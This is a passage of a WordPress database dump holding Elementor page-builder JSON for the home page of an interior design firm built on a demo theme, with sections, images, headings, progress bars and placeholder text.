ode','builder'),(3197,4764,'_elementor_template_type','wp-page'),(3198,4764,'_elementor_version','3.8.1'),(3199,4764,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"015c584\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"200\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"180\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"animation\":\"fadeInUp\",\"animation_tablet\":\"none\",\"animation_delay\":200},\"elements\":[{\"id\":\"f11899a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"content_position\":\"top\",\"align\":\"center\"},\"elements\":[{\"id\":\"b5b032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Trust the experts for all your <strong style=\\\"color: #242424;\\\">architects &amp; interior needs.<\\/strong><\\/p>\",\"text_color\":\"#9C9C9C\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_font_weight\":\"600\",\"_padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"60\",\"bottom\":\"15\",\"left\":\"40\",\"isLinked\":false},\"_element_width\":\"auto\",\"_background_background\":\"classic\",\"_background_color\":\"#F5F5F5\",\"align_mobile\":\"center\",\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":false},\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6c98d6d\",\"elType\":\"widget\",\"settings\":{\"text\":\"More Service\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"40\",\"bottom\":\"25\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/services\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure 